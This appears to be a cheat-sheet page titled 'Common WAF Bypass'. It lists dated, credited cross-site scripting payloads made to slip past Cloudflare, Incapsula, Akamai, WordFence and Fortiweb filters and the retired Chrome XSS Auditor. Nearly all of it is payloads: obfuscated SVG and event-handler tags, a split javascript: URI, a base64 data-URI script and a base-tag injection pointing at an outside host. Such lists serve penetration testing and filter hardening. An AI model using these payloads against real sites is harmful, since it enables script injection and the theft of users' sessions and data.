3.1 KiB
Common WAF Bypass
WAFs are designed to filter out malicious content by inspecting incoming and outgoing traffic for patterns indicative of attacks. Despite their sophistication, WAFs often struggle to keep up with the diverse methods attackers use to obfuscate and modify their payloads to circumvent detection.
Summary
Cloudflare
-
25st January 2021 - @Bohdan Korzhynskyi
<svg/onrandom=random onload=confirm(1)> <video onnull=null onmouseover=confirm(1)>
-
21st April 2020 - @Bohdan Korzhynskyi
<svg/OnLoad="`${prompt``}`">
-
22nd August 2019 - @Bohdan Korzhynskyi
<svg/onload=%26nbsp;alert`bohdan`+
-
5th June 2019 - @Bohdan Korzhynskyi
1'"><img/src/onerror=.1|alert``>
-
3rd June 2019 - @Bohdan Korzhynskyi
<svg onload=prompt%26%230000000040document.domain)> <svg onload=prompt%26%23x000000028;document.domain)> xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
-
22nd March 2019 - @RakeshMane10
<svg/onload=alert()//
-
27th February 2018
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
Chrome Auditor
NOTE: Chrome Auditor is deprecated and removed on latest version of Chrome and Chromium Browser.
- 9th August 2018
</script><svg><script>alert(1)-%26apos%3B
Incapsula WAF
-
11th May 2019 - @daveysec
<svg onload\r\n=$.globalEval("al"+"ert()");>
-
8th March 2018 - @Alra3ees
anythinglr00</script><script>alert(document.domain)</script>uxldz anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
-
11th September 2018 - @c0d3G33k
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
Akamai WAF
-
18th June 2018 - @zseano
?"></script><base%20c%3D=href%3Dhttps:\mysite>
-
28th October 2018 - @s0md3v
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
WordFence WAF
- 12th September 2018 - @brutelogic
<a href=javascript:alert(1)>
Fortiweb WAF
- 9th July 2019 - @rezaduty
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e